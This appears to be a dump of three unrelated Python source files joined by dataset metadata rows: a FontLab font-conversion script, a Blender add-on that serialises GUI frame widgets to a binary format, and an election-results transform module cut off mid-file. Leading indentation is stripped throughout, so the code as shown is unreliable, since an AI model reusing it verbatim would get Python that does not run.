for gName in ["NULL", "nonmarkingreturn"]:
if gName in glyphOrder:
del glyphOrder[glyphOrder.index(gName)]
font.setGlyphOrder(glyphOrder)
del glyfTable.glyphs[gName]
del hmtxTable.metrics[gName]
if gName in postTable.extraNames:
del postTable.extraNames[postTable.extraNames.index(gName)]
# Extend the prep table
# If the last byte is
# WCVTP[ ] /* WriteCVTInPixels */
# add these extra bytes
# MPPEM[ ] /* MeasurePixelPerEm */
# PUSHW[ ] /* 1 value pushed */
# 96
# GT[ ] /* GreaterThan */
# IF[ ] /* If */
# PUSHB[ ] /* 1 value pushed */
# 1
# ELSE[ ] /* Else */
# PUSHB[ ] /* 1 value pushed */
# 0
# EIF[ ] /* EndIf */
# PUSHB[ ] /* 1 value pushed */
# 1
# INSTCTRL[ ] /* SetInstrExecControl */
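	# Byte values appended below correspond to the opcodes above:
	#   0x44=WCVTP, 0x4B=MPPEM, 0xB8=PUSHW[0] (+2 data bytes for the word 96),
	#   0x52=GT, 0x58=IF, 0xB0=PUSHB[0] (+1 data byte), 0x1B=ELSE,
	#   0x59=EIF, 0x8E=INSTCTRL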
if prepTable:
if prepTable.program.bytecode[-1] == 68:
prepTable.program.bytecode.extend(
[75, 184, 0, 96, 82, 88, 176, 1, 27, 176, 0, 89, 176, 1, 142])
# Save the changes
folderPath, fontFileName = os.path.split(fontFilePath)
newFontFilePath = os.path.join(folderPath, "%s%s" % ('_', fontFileName))
font.save(newFontFilePath)
font.close()
os.remove(fontFilePath)
os.rename(newFontFilePath, fontFilePath)
def convertTXTfontToPFA(txtPath):
tempPFApath = txtPath.replace('.txt', '_TEMP_.pfa')
command = 'type1 "%s" > "%s"' % (txtPath, tempPFApath)
# Run type1 tool
if MAC:
pp = os.popen(command)
# report = pp.read()
pp.close()
if PC:
pp = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
out, err = pp.communicate()
if err:
print out, err
return tempPFApath
def convertUFOfontToPFA(ufoPath):
tempPFApath = ufoPath.replace('.ufo', '_TEMP_.pfa')
command = 'tx -t1 "%s" > "%s"' % (ufoPath, tempPFApath)
# Run tx tool
if MAC:
pp = os.popen(command)
# report = pp.read()
pp.close()
if PC:
pp = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
out, err = pp.communicate()
if err:
print out, err
return tempPFApath
def processFonts(fontsList):
totalFonts = len(fontsList)
print "%d fonts found:\n%s\n" % (totalFonts, '\n'.join(fontsList))
setType1openPrefs()
setTTgeneratePrefs()
setTTautohintPrefs()
fontIndex = 1
for pfaPath in fontsList:
# Make temporary encoding file from GOADB file. This step needs to
# be done per font, because the directory tree selected may contain
# more than one family, or because the glyph set of a given family
# may not be the same for both Roman/Upright and Italic/Sloped.
encPath = None
goadbPath = None
# The GOADB can be located in the same folder or up to two
# levels above in the directory tree
sameLevel = os.path.join(os.path.dirname(pfaPath), kGOADBfileName)
oneUp = os.path.join(
os.path.dirname(os.path.dirname(pfaPath)), kGOADBfileName)
twoUp = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(pfaPath))), kGOADBfileName)
if os.path.exists(sameLevel):
goadbPath = sameLevel
elif os.path.exists(oneUp):
goadbPath = oneUp
elif os.path.exists(twoUp):
goadbPath = twoUp
if goadbPath:
encPath = makeTempEncFileFromGOADB(goadbPath)
else:
print "Could not find %s file." % kGOADBfileName
print "Skipping %s" % pfaPath
print
if not encPath:
continue
# Checking if a derivedchars file exists.
# If not, the dvInput step is skipped.
makeDV = False
for file in os.listdir(os.path.split(pfaPath)[0]):
if re.search(r'derivedchars(.+?)?$', file) and dvModuleFound:
makeDV = True
fontIsTXT = False
fontIsUFO = False
if kFontTXT in pfaPath:
fontIsTXT = True
pfaPath = convertTXTfontToPFA(pfaPath)
elif kFontUFO in pfaPath or (pfaPath[-4:].lower() in [".ufo"]):
# Support more than just files named "font.ufo"
fontIsUFO = True
pfaPath = convertUFOfontToPFA(pfaPath)
fl.Open(pfaPath)
print "\nProcessing %s ... (%d/%d)" % (
fl.font.font_name, fontIndex, totalFonts)
fontIndex += 1
fontZonesWereReplaced = replaceFontZonesByFamilyZones()
baselineZonesWereRemoved = removeBottomZonesAboveBaseline()
# NOTE: After making changes to the PostScript alignment zones, the TT
# equivalents have to be updated as well, but I couldn't find a way
# to do it via scripting (because TTH.top_zones and TTH.bottom_zones
# are read-only, and despite that functionality being available in
# the UI, there's no native function to update TT zones from T1 zones).
# So the solution is to generate a new T1 font and open it back.
pfaPathTemp = pfaPath.replace('.pfa', '_TEMP_.pfa')
infPathTemp = pfaPathTemp.replace('.pfa', '.inf')
if baselineZonesWereRemoved or fontZonesWereReplaced:
fl.GenerateFont(eval("ftTYPE1ASCII"), pfaPathTemp)
fl[fl.ifont].modified = 0
fl.Close(fl.ifont)
fl.Open(pfaPathTemp)
if os.path.exists(infPathTemp):
# Delete the .INF file (bug in FL v5.1.x)
os.remove(infPathTemp)
# Load encoding file
fl.font.encoding.Load(encPath)
# Make sure the Font window is in 'Names mode'
fl.CallCommand(fl_cmd.FontModeNames)
# Sort glyphs by encoding
fl.CallCommand(fl_cmd.FontSortByCodepage)
# read derivedchars file, make components
if makeDV:
dvInput_module.run(verbose=False)
convertT1toTT()
changeTTfontSettings()
# Switch the Font window to 'Index mode'
fl.CallCommand(fl_cmd.FontModeIndex)
# path to the folder containing the font, and the font's file name
folderPath, fontFileName = os.path.split(pfaPath)
ppmsFilePath = os.path.join(folderPath, kPPMsFileName)
if os.path.exists(ppmsFilePath):
hPPMs, vPPMs = readPPMsFile(ppmsFilePath)
replaceStemsAndPPMs(hPPMs, vPPMs)
tthintsFilePath = os.path.join(folderPath, kTTHintsFileName)
if os.path.exists(tthintsFilePath):
inputTTHints.run(folderPath)
# readTTHintsFile(tthintsFilePath)
# replaceTTHints()
# FontLab 5.1.5 Mac Build 5714 does NOT respect the unchecked
# option "Automatically add .null, CR and space characters"
for gName in ["NULL", "CR"]:
gIndex = fl.font.FindGlyph(gName)
if gIndex != -1:
del fl.font.glyphs[gIndex]
vfbPath = pfaPath.replace('.pfa', '.vfb')
fl.Save(vfbPath)
# The filename of the TT output is hardcoded
ttfPath = os.path.join(folderPath, kFontTTF)
fl.GenerateFont(eval("ftTRUETYPE"), ttfPath)
fl[fl.ifont].modified = 0
fl.Close(fl.ifont)
# The TT font generated with FontLab ends up with a few glyph names
# changed. Fix the glyph names so that makeOTF does not fail.
postProccessTTF(ttfPath)
# Delete temporary Encoding file:
if os.path.exists(encPath):
os.remove(encPath)
# Delete temp PFA:
if os.path.exists(pfaPathTemp):
os.remove(pfaPathTemp)
# Cleanup after processing from TXT type1 font or UFO font
if fontIsTXT or fontIsUFO:
if os.path.exists(pfaPath):
os.remove(pfaPath)
if os.path.exists(ttfPath):
finalTTFpath = ttfPath.replace('_TEMP_.ttf', '.ttf')
if finalTTFpath != ttfPath:
if PC:
os.remove(finalTTFpath)
os.rename(ttfPath, finalTTFpath)
if os.path.exists(vfbPath):
finalVFBpath = vfbPath.replace('_TEMP_.vfb', '.vfb')
if finalVFBpath != vfbPath:
if PC and os.path.exists(finalVFBpath):
os.remove(finalVFBpath)
os.rename(vfbPath, finalVFBpath)
# remove FontLab leftovers
pfmPath = pfaPathTemp.replace('.pfa', '.pfm')
afmPath = pfaPathTemp.replace('.pfa', '.afm')
if os.path.exists(pfmPath):
os.remove(pfmPath)
if os.path.exists(afmPath):
os.remove(afmPath)
def run():
# Get folder to process
baseFolderPath = fl.GetPathName("Select font family directory")
if not baseFolderPath: # Cancel was clicked or ESC key was pressed
return
startTime = time.time()
fontsList = getFontPaths(baseFolderPath)
if len(fontsList):
processFonts(fontsList)
else:
print "No fonts found"
endTime = time.time()
elapsedSeconds = endTime-startTime
if (elapsedSeconds/60) < 1:
print '\nCompleted in %.1f seconds.\n' % elapsedSeconds
else:
print '\nCompleted in %d minutes and %d seconds.\n' % (
elapsedSeconds/60, elapsedSeconds%60)
if __name__ == "__main__":
if not errorHappened:
run()
|
mit
| -4,984,340,435,244,985,000
| 34.212637
| 131
| 0.621636
| false
| 3.592859
| false
| false
| false
|
RetroView/hecl
|
blender/hecl/frme.py
|
3
|
21197
|
import bpy, struct, math
from mathutils import Quaternion
def draw(layout, context):
if bpy.context.active_object:
obj = bpy.context.active_object
layout.label(text="Widget Settings:", icon='OBJECT_DATA')
layout.prop_menu_enum(obj, 'retro_widget_type', text='Widget Type')
#layout.prop_search(obj, 'retro_widget_parent', context.scene, 'objects', text='Widget Parent')
row = layout.row(align=True)
row.prop(obj, 'retro_widget_default_visible', text='Visible')
row.prop(obj, 'retro_widget_default_active', text='Active')
row.prop(obj, 'retro_widget_cull_faces', text='Cull Faces')
layout.prop(obj, 'retro_widget_color', text='Color')
layout.prop_menu_enum(obj, 'retro_widget_model_draw_flags', text='Draw Flags')
row = layout.row(align=True)
row.prop(obj, 'retro_widget_is_worker', text='Is Worker')
if obj.retro_widget_is_worker:
row.prop(obj, 'retro_widget_worker_id', text='Worker Id')
if obj.retro_widget_type == 'RETRO_MODL':
layout.prop(obj, 'retro_model_light_mask', text='Light Mask')
elif obj.retro_widget_type == 'RETRO_PANE':
layout.prop(obj, 'retro_pane_dimensions', text='Dimensions')
layout.prop(obj, 'retro_pane_scale_center', text='Center')
elif obj.retro_widget_type == 'RETRO_TXPN':
layout.prop(obj, 'retro_pane_dimensions', text='Dimensions')
layout.prop(obj, 'retro_pane_scale_center', text='Center')
layout.prop(obj, 'retro_textpane_font_path', text='Font Path')
row = layout.row(align=True)
row.prop(obj, 'retro_textpane_word_wrap', text='Word Wrap')
row.prop(obj, 'retro_textpane_horizontal', text='Horizontal')
layout.prop(obj, 'retro_textpane_fill_color', text='Fill Color')
layout.prop(obj, 'retro_textpane_outline_color', text='Outline Color')
layout.prop(obj, 'retro_textpane_block_extent', text='Point Dimensions')
layout.prop(obj, 'retro_textpane_jp_font_path', text='JP Font Path')
layout.prop(obj, 'retro_textpane_jp_font_scale', text='JP Point Dimensions')
layout.prop_menu_enum(obj, 'retro_textpane_hjustification', text='Horizontal Justification')
layout.prop_menu_enum(obj, 'retro_textpane_vjustification', text='Vertical Justification')
elif obj.retro_widget_type == 'RETRO_TBGP':
layout.prop(obj, 'retro_tablegroup_elem_count', text='Element Count')
layout.prop(obj, 'retro_tablegroup_elem_default', text='Default Element')
layout.prop(obj, 'retro_tablegroup_wraparound', text='Wraparound')
elif obj.retro_widget_type == 'RETRO_GRUP':
layout.prop(obj, 'retro_group_default_worker', text='Default Worker')
elif obj.retro_widget_type == 'RETRO_SLGP':
row = layout.row(align=True)
row.prop(obj, 'retro_slider_min', text='Min')
row.prop(obj, 'retro_slider_max', text='Max')
layout.prop(obj, 'retro_slider_default', text='Default')
layout.prop(obj, 'retro_slider_increment', text='Increment')
elif obj.retro_widget_type == 'RETRO_ENRG':
layout.prop(obj, 'retro_energybar_texture_path', text='Energy Bar Texture Path')
elif obj.retro_widget_type == 'RETRO_METR':
layout.prop(obj, 'retro_meter_no_round_up', text='No Round Up')
layout.prop(obj, 'retro_meter_max_capacity', text='Max Capacity')
layout.prop(obj, 'retro_meter_worker_count', text='Worker Count')
elif obj.retro_widget_type == 'RETRO_LITE':
if obj.data and obj.type == 'LIGHT':
layout.prop(obj.data, 'retro_light_index', text='Index')
layout.label(text="Angular Falloff:", icon='LIGHT')
row = layout.row(align=True)
row.prop(obj.data, 'retro_light_angle_constant', text='Constant')
row.prop(obj.data, 'retro_light_angle_linear', text='Linear')
row.prop(obj.data, 'retro_light_angle_quadratic', text='Quadratic')
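# Usage sketch: draw() is written to be called from a bpy UI panel's own
# draw() with that panel's layout and the current context, e.g. (hypothetical
# panel class, not part of this module):
#   class HECL_PT_frme(bpy.types.Panel):
#       ...
#       def draw(self, context):
#           draw(self.layout, context)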
hjustifications = None
vjustifications = None
model_draw_flags_e = None
def recursive_cook(buffer, obj, version, path_hasher, parent_name):
buffer += struct.pack('>4s', obj.retro_widget_type[6:].encode())
buffer += obj.name.encode() + b'\0'
buffer += parent_name.encode() + b'\0'
buffer += struct.pack('>bbbbffffI',
False,
obj.retro_widget_default_visible,
obj.retro_widget_default_active,
obj.retro_widget_cull_faces,
obj.retro_widget_color[0],
obj.retro_widget_color[1],
obj.retro_widget_color[2],
obj.retro_widget_color[3],
model_draw_flags_e[obj.retro_widget_model_draw_flags])
angle = Quaternion((1.0, 0.0, 0.0), 0)
if obj.retro_widget_type == 'RETRO_CAMR':
angle = Quaternion((1.0, 0.0, 0.0), math.radians(-90.0))
aspect = bpy.context.scene.render.resolution_x / bpy.context.scene.render.resolution_y
if obj.data.type == 'PERSP':
if aspect > 1.0:
fov = math.degrees(math.atan(math.tan(obj.data.angle / 2.0) / aspect)) * 2.0
else:
fov = math.degrees(obj.data.angle)
buffer += struct.pack('>Iffff', 0, fov, aspect, obj.data.clip_start, obj.data.clip_end)
elif obj.data.type == 'ORTHO':
ortho_half = obj.data.ortho_scale / 2.0
buffer += struct.pack('>Iffffff', 1, -ortho_half, ortho_half, ortho_half / aspect,
-ortho_half / aspect, obj.data.clip_start, obj.data.clip_end)
elif obj.retro_widget_type == 'RETRO_MODL':
if len(obj.children) == 0:
            raise RuntimeError('Model Widget must have a child model object')
        model_obj = obj.children[0]
        if model_obj.type != 'MESH':
            raise RuntimeError('Model Widget must have a child MESH')
        if not model_obj.data.library:
            raise RuntimeError('Model Widget must have a linked library MESH')
path = bpy.path.abspath(model_obj.data.library.filepath)
path_hash = path_hasher.hashpath32(path)
buffer += struct.pack('>III', path_hash, 0, obj.retro_model_light_mask)
elif obj.retro_widget_type == 'RETRO_PANE':
buffer += struct.pack('>fffff',
obj.retro_pane_dimensions[0],
obj.retro_pane_dimensions[1],
obj.retro_pane_scale_center[0],
obj.retro_pane_scale_center[1],
obj.retro_pane_scale_center[2])
elif obj.retro_widget_type == 'RETRO_TXPN':
path_hash = path_hasher.hashpath32(obj.retro_textpane_font_path)
buffer += struct.pack('>fffffIbbIIffffffffff',
obj.retro_pane_dimensions[0],
obj.retro_pane_dimensions[1],
obj.retro_pane_scale_center[0],
obj.retro_pane_scale_center[1],
obj.retro_pane_scale_center[2],
path_hash,
obj.retro_textpane_word_wrap,
obj.retro_textpane_horizontal,
hjustifications[obj.retro_textpane_hjustification],
vjustifications[obj.retro_textpane_vjustification],
obj.retro_textpane_fill_color[0],
obj.retro_textpane_fill_color[1],
obj.retro_textpane_fill_color[2],
obj.retro_textpane_fill_color[3],
obj.retro_textpane_outline_color[0],
obj.retro_textpane_outline_color[1],
obj.retro_textpane_outline_color[2],
obj.retro_textpane_outline_color[3],
obj.retro_textpane_block_extent[0],
obj.retro_textpane_block_extent[1])
if version >= 1:
path_hash = path_hasher.hashpath32(obj.retro_textpane_jp_font_path)
buffer += struct.pack('>III',
path_hash,
obj.retro_textpane_jp_font_scale[0],
obj.retro_textpane_jp_font_scale[1])
elif obj.retro_widget_type == 'RETRO_TBGP':
buffer += struct.pack('>HHIHHbbffbfHHHH',
obj.retro_tablegroup_elem_count,
0,
0,
obj.retro_tablegroup_elem_default,
0,
obj.retro_tablegroup_wraparound,
False,
0.0,
0.0,
False,
0.0,
0,
0,
0,
0)
elif obj.retro_widget_type == 'RETRO_GRUP':
buffer += struct.pack('>Hb',
obj.retro_group_default_worker,
False)
elif obj.retro_widget_type == 'RETRO_SLGP':
buffer += struct.pack('>ffff',
obj.retro_slider_min,
obj.retro_slider_max,
obj.retro_slider_default,
obj.retro_slider_increment)
elif obj.retro_widget_type == 'RETRO_ENRG':
path_hash = path_hasher.hashpath32(obj.retro_energybar_texture_path)
buffer += struct.pack('>I', path_hash)
elif obj.retro_widget_type == 'RETRO_METR':
buffer += struct.pack('>bbII',
False,
obj.retro_meter_no_round_up,
obj.retro_meter_max_capacity,
obj.retro_meter_worker_count)
elif obj.retro_widget_type == 'RETRO_LITE':
angle = Quaternion((1.0, 0.0, 0.0), math.radians(-90.0))
type_enum = 0
constant = 1.0
linear = 0.0
quadratic = 0.0
cutoff = 0.0
if obj.data.type == 'POINT':
type_enum = 4
elif obj.data.type == 'SUN':
type_enum = 2
elif obj.data.type == 'SPOT':
type_enum = 0
cutoff = obj.data.spot_size
if obj.data.type == 'POINT' or obj.data.type == 'SPOT':
constant = obj.data.constant_coefficient
linear = obj.data.linear_coefficient
quadratic = obj.data.quadratic_coefficient
buffer += struct.pack('>IffffffI',
type_enum, constant, linear, quadratic,
obj.data.retro_light_angle_constant,
obj.data.retro_light_angle_linear,
obj.data.retro_light_angle_quadratic,
obj.data.retro_light_index)
if obj.data.type == 'SPOT':
buffer += struct.pack('>f', cutoff)
elif obj.retro_widget_type == 'RETRO_IMGP':
if obj.type != 'MESH':
            raise RuntimeError('Imagepane Widget must be a MESH')
        if len(obj.data.loops) < 4:
            raise RuntimeError('Imagepane Widget must be a MESH with 4 verts')
        if len(obj.data.uv_layers) < 1:
            raise RuntimeError('Imagepane Widget must be a MESH with a UV layer')
path_hash = 0xffffffff
if len(obj.data.materials):
material = obj.data.materials[0]
if 'Image Texture' in material.node_tree.nodes:
image_node = material.node_tree.nodes['Image Texture']
if image_node.image:
image = image_node.image
path = bpy.path.abspath(image.filepath)
path_hash = path_hasher.hashpath32(path)
buffer += struct.pack('>IIII', path_hash, 0, 0, 4)
for i in range(4):
vi = obj.data.loops[i].vertex_index
co = obj.data.vertices[vi].co
buffer += struct.pack('>fff', co[0], co[1], co[2])
buffer += struct.pack('>I', 4)
for i in range(4):
co = obj.data.uv_layers[0].data[i].uv
buffer += struct.pack('>ff', co[0], co[1])
if obj.retro_widget_is_worker:
buffer += struct.pack('>bH', True, obj.retro_widget_worker_id)
else:
buffer += struct.pack('>b', False)
angMtx = angle.to_matrix() @ obj.matrix_local.to_3x3()
buffer += struct.pack('>fffffffffffffffIH',
obj.matrix_local[0][3],
obj.matrix_local[1][3],
obj.matrix_local[2][3],
angMtx[0][0], angMtx[0][1], angMtx[0][2],
angMtx[1][0], angMtx[1][1], angMtx[1][2],
angMtx[2][0], angMtx[2][1], angMtx[2][2],
0.0, 0.0, 0.0, 0, 0)
ch_list = []
for ch in obj.children:
ch_list.append((ch.pass_index, ch.name))
for s_pair in sorted(ch_list):
ch = bpy.data.objects[s_pair[1]]
if ch.retro_widget_type != 'RETRO_NONE':
recursive_cook(buffer, ch, version, path_hasher, obj.name)
def cook(writepipebuf, version, path_hasher):
global hjustifications, vjustifications, model_draw_flags_e
hjustifications = dict((i[0], i[3]) for i in bpy.types.Object.retro_textpane_hjustification[1]['items'])
vjustifications = dict((i[0], i[3]) for i in bpy.types.Object.retro_textpane_vjustification[1]['items'])
model_draw_flags_e = dict((i[0], i[3]) for i in bpy.types.Object.retro_widget_model_draw_flags[1]['items'])
buffer = bytearray()
buffer += struct.pack('>IIII', 0, 0, 0, 0)
widget_count = 0
for obj in bpy.data.objects:
if obj.retro_widget_type != 'RETRO_NONE':
widget_count += 1
buffer += struct.pack('>I', widget_count)
for obj in bpy.data.objects:
if obj.retro_widget_type != 'RETRO_NONE' and not obj.parent:
recursive_cook(buffer, obj, version, path_hasher, 'kGSYS_DummyWidgetID')
return buffer
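# Invocation sketch: cook() expects a hasher object exposing hashpath32();
# hecl supplies the real one, the stand-in below is purely hypothetical:
#   class _FakeHasher:
#       def hashpath32(self, path):
#           return hash(path) & 0xffffffff
#   frme_bytes = cook(None, version=1, path_hasher=_FakeHasher())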
# Registration
def register():
frame_widget_types = [
('RETRO_NONE', 'Not a Widget', '', 0),
('RETRO_BWIG', 'Base Widget', '', 1),
('RETRO_CAMR', 'Camera', '', 2),
('RETRO_ENRG', 'Energy Bar', '', 3),
('RETRO_GRUP', 'Group', '', 4),
('RETRO_HWIG', 'Head Widget', '', 5),
('RETRO_IMGP', 'Image Pane', '', 6),
('RETRO_LITE', 'Light', '', 7),
('RETRO_MODL', 'Model', '', 8),
('RETRO_METR', 'Meter', '', 9),
('RETRO_PANE', 'Pane', '', 10),
('RETRO_SLGP', 'Slider Group', '', 11),
('RETRO_TBGP', 'Table Group', '', 12),
('RETRO_TXPN', 'Text Pane', '', 13)]
bpy.types.Object.retro_widget_type = bpy.props.EnumProperty(items=frame_widget_types, name='Retro: FRME Widget Type', default='RETRO_NONE')
model_draw_flags = [
('RETRO_SHADELESS', 'Shadeless', '', 0),
('RETRO_OPAQUE', 'Opaque', '', 1),
('RETRO_ALPHA', 'Alpha', '', 2),
('RETRO_ADDITIVE', 'Additive', '', 3),
('RETRO_ALPHA_ADDITIVE_OVERDRAW', 'Alpha Additive Overdraw', '', 4)]
bpy.types.Object.retro_widget_parent = bpy.props.StringProperty(name='Retro: FRME Widget Parent', description='Refers to internal frame widgets')
    bpy.types.Object.retro_widget_use_anim_controller = bpy.props.BoolProperty(name='Retro: Use Animation Controller')
    bpy.types.Object.retro_widget_default_visible = bpy.props.BoolProperty(name='Retro: Default Visible', description='Sets whether the widget is visible by default')
    bpy.types.Object.retro_widget_default_active = bpy.props.BoolProperty(name='Retro: Default Active', description='Sets whether the widget is active by default')
bpy.types.Object.retro_widget_cull_faces = bpy.props.BoolProperty(name='Retro: Cull Faces', description='Enables face culling')
bpy.types.Object.retro_widget_color = bpy.props.FloatVectorProperty(name='Retro: Color', description='Sets widget color', subtype='COLOR', size=4, min=0.0, max=1.0)
bpy.types.Object.retro_widget_model_draw_flags = bpy.props.EnumProperty(items=model_draw_flags, name='Retro: Model Draw Flags', default='RETRO_ALPHA')
bpy.types.Object.retro_widget_is_worker = bpy.props.BoolProperty(name='Retro: Is Worker Widget', default=False)
bpy.types.Object.retro_widget_worker_id = bpy.props.IntProperty(name='Retro: Worker Widget ID', min=0, default=0)
bpy.types.Object.retro_model_light_mask = bpy.props.IntProperty(name='Retro: Model Light Mask', min=0, default=0)
bpy.types.Object.retro_pane_dimensions = bpy.props.FloatVectorProperty(name='Retro: Pane Dimensions', min=0.0, size=2)
bpy.types.Object.retro_pane_scale_center = bpy.props.FloatVectorProperty(name='Retro: Scale Center', size=3)
bpy.types.Object.retro_textpane_font_path = bpy.props.StringProperty(name='Retro: Font Path')
bpy.types.Object.retro_textpane_word_wrap = bpy.props.BoolProperty(name='Retro: Word Wrap')
bpy.types.Object.retro_textpane_horizontal = bpy.props.BoolProperty(name='Retro: Horizontal', default=True)
bpy.types.Object.retro_textpane_fill_color = bpy.props.FloatVectorProperty(name='Retro: Fill Color', min=0.0, max=1.0, size=4, subtype='COLOR')
bpy.types.Object.retro_textpane_outline_color = bpy.props.FloatVectorProperty(name='Retro: Outline Color', min=0.0, max=1.0, size=4, subtype='COLOR')
bpy.types.Object.retro_textpane_block_extent = bpy.props.FloatVectorProperty(name='Retro: Block Extent', min=0.0, size=2)
bpy.types.Object.retro_textpane_jp_font_path = bpy.props.StringProperty(name='Retro: Japanese Font Path')
bpy.types.Object.retro_textpane_jp_font_scale = bpy.props.IntVectorProperty(name='Retro: Japanese Font Scale', min=0, size=2)
frame_textpane_hjustifications = [
('LEFT', 'Left', '', 0),
('CENTER', 'Center', '', 1),
('RIGHT', 'Right', '', 2),
('FULL', 'Full', '', 3),
('NLEFT', 'Left Normalized', '', 4),
('NCENTER', 'Center Normalized', '', 5),
('NRIGHT', 'Right Normalized', '', 6),
('LEFTMONO', 'Left Monospaced', '', 7),
('CENTERMONO', 'Center Monospaced', '', 8),
('RIGHTMONO', 'Right Monospaced', '', 9)]
bpy.types.Object.retro_textpane_hjustification = bpy.props.EnumProperty(items=frame_textpane_hjustifications, name='Retro: Horizontal Justification', default='LEFT')
frame_textpane_vjustifications = [
('TOP', 'Top', '', 0),
('CENTER', 'Center', '', 1),
('BOTTOM', 'Bottom', '', 2),
('FULL', 'Full', '', 3),
('NTOP', 'Top Normalized', '', 4),
('NCENTER', 'Center Normalized', '', 5),
('NBOTTOM', 'Bottom Normalized', '', 6),
('TOPMONO', 'Top Monospaced', '', 7),
('CENTERMONO', 'Center Monospaced', '', 8),
('BOTTOMMONO', 'Bottom Monospaced', '', 9)]
bpy.types.Object.retro_textpane_vjustification = bpy.props.EnumProperty(items=frame_textpane_vjustifications, name='Retro: Vertical Justification', default='TOP')
bpy.types.Object.retro_tablegroup_elem_count = bpy.props.IntProperty(name='Retro: Table Group Element Count', min=0, default=0)
bpy.types.Object.retro_tablegroup_elem_default = bpy.props.IntProperty(name='Retro: Table Group Default Element', min=0, default=0)
bpy.types.Object.retro_tablegroup_wraparound = bpy.props.BoolProperty(name='Retro: Table Group Wraparound', default=False)
bpy.types.Object.retro_group_default_worker = bpy.props.IntProperty(name='Retro: Group Default Worker', min=0, default=0)
bpy.types.Object.retro_slider_min = bpy.props.FloatProperty(name='Retro: Slider Min', default=0.0)
bpy.types.Object.retro_slider_max = bpy.props.FloatProperty(name='Retro: Slider Max', default=1.0)
bpy.types.Object.retro_slider_default = bpy.props.FloatProperty(name='Retro: Slider Default', default=0.0)
bpy.types.Object.retro_slider_increment = bpy.props.FloatProperty(name='Retro: Slider Increment', min=0.0, default=1.0)
bpy.types.Object.retro_energybar_texture_path = bpy.props.StringProperty(name='Retro: Energy Bar Texture Path')
bpy.types.Object.retro_meter_no_round_up = bpy.props.BoolProperty(name='Retro: No Round Up', default=True)
bpy.types.Object.retro_meter_max_capacity = bpy.props.IntProperty(name='Retro: Max Capacity', min=0, default=100)
bpy.types.Object.retro_meter_worker_count = bpy.props.IntProperty(name='Retro: Worker Count', min=0, default=1)
bpy.types.Light.retro_light_index = bpy.props.IntProperty(name='Retro: Light Index', min=0, default=0)
bpy.types.Light.retro_light_angle_constant = bpy.props.FloatProperty(name='Retro: Light Angle Constant', min=0.0, default=0.0)
bpy.types.Light.retro_light_angle_linear = bpy.props.FloatProperty(name='Retro: Light Angle Linear', min=0.0, default=0.0)
bpy.types.Light.retro_light_angle_quadratic = bpy.props.FloatProperty(name='Retro: Light Angle Quadratic', min=0.0, default=0.0)
|
mit
| -7,502,796,951,139,289,000
| 53.212276
| 169
| 0.586168
| false
| 3.407878
| false
| false
| false
|
lanacioncom/elecciones_2015_caba
|
backend/scripts/apitransforms.py
|
1
|
8671
|
# coding: utf-8
import logging
# TODO Remove only for testing
import json
import io
from utils import get_percentage, format_percentage, sort_results_by_percentage
from config import JSON_EXAMPLE_PATH, SPECIAL_PARTIES, PASS_THRESHOLD
from config import Paso2015
log = logging.getLogger('paso.%s' % (__name__))
PERC_KEYS = ["pct", "pct_total"]
RESUMEN_RENAME = {
'Electores': 'e',
'VotantesJef': 'v',
'Mesas': 'mt',
'MesasInformadas': 'mi',
'UltimaActualizacion': 'ut'
}
RESULTS_CAND_RENAME = {
"id_candidato": "id",
"votos": "v",
"pct": "p",
"pct_total": "pt"
}
RESULTS_PARTY_RENAME = {
"votos": "v",
"pct": "p",
"id_partido": "id",
}
RESULTS_PARTY_SUMM_RENAME = {
"votos": "v",
"pct": "p",
}
def to_json(fname=None, d=None):
'''For testing purposes'''
with io.open('%s/%s.json'
% (JSON_EXAMPLE_PATH, fname),
'w', encoding='utf8') as f:
log.debug("writing output JSON: %s.json" % (fname))
f.write(json.dumps(d, ensure_ascii=False))
def t_rename_data(d=None, translation=None, p_keys=None):
'''translate desired data'''
target_dict = {}
try:
for k, v in translation.iteritems():
if (k in p_keys):
d[k] = format_percentage(d[k])
target_dict[v] = d[k]
except KeyError, e:
log.error("Could not find required key %s in %s" % (k, d))
raise Paso2015(__name__)
return target_dict
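# Worked example (hypothetical row from the results feed): with
# translation=RESULTS_PARTY_RENAME and p_keys=PERC_KEYS,
#   t_rename_data({"votos": 10, "pct": "12.3456", "id_partido": "7"}, ...)
# returns {"v": 10, "p": format_percentage("12.3456"), "id": "7"}.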
def t_resumen_API(origin_dict=None):
'''get the desired data'''
target_dict = {}
try:
for k, v in RESUMEN_RENAME.iteritems():
target_dict[v] = origin_dict['resumen'][k]
except KeyError:
log.error("Could not find required key %s in %s" % (k, origin_dict))
raise Paso2015(__name__)
# Calculate table percentage
mp = get_percentage(target_dict, 'mi', 'mt')
target_dict["mp"] = mp
# Calculate voting percentage
vp = get_percentage(target_dict, 'v', 'e')
target_dict["vp"] = vp
return target_dict
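# Resulting summary keys (short names per RESUMEN_RENAME plus the two derived
# percentages; the Spanish expansions are inferred from the API field names):
# e=electores, v=votantes (Jefe de Gobierno), mt=mesas totales,
# mi=mesas informadas, ut=ultima actualizacion, mp=% mesas informadas,
# vp=% de participacion.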
def t_results_section_API(d=None, comuna=None, dest_dict=None):
'''Transform the received data
to the desired format'''
a99 = []
a00 = []
try:
if not comuna:
# 0 stores the global results for the election
data = d["general"][0]["partidos"]
else:
data = d["general"][0]["comunas"]["partidos"]
except (KeyError, IndexError), e:
log.error("Did not find data in memory. Reason" % (str(e)))
raise Paso2015(__name__)
try:
for idx, row in enumerate(data):
a00.append(t_rename_data(row, RESULTS_PARTY_RENAME, PERC_KEYS))
if len(row["listas"]) == 1:
# Do not include special parties inside "Listas únicas"
if row["id_partido"] not in SPECIAL_PARTIES:
a99.append(t_rename_data(row,
RESULTS_PARTY_RENAME,
PERC_KEYS))
else:
# Create transformed array for parties with many candidates
t_a = [t_rename_data(l, RESULTS_CAND_RENAME, PERC_KEYS)
for l in row["listas"]]
if not comuna:
# First time we see the party create a dictionary for it
# and append results
t_d = {"r": t_rename_data(row,
RESULTS_PARTY_SUMM_RENAME,
PERC_KEYS),
"c_%02d" % (comuna): t_a}
# Create the key for the policitical party
# inside the target dict
dest_dict["partido_%s"
% (row["id_partido"])] = t_d
else:
# For every other section
# We only need to create a section key
# with the candidates array
dest_dict["partido_%s"
% (row["id_partido"])]["c_%02d" % (comuna)] = t_a
except KeyError, e:
log.error("Error processing key. Reason %s" % (str(e)))
raise Paso2015(__name__)
except IndexError, e:
log.error("Error processing index. Reason %s" % (str(e)))
raise Paso2015(__name__)
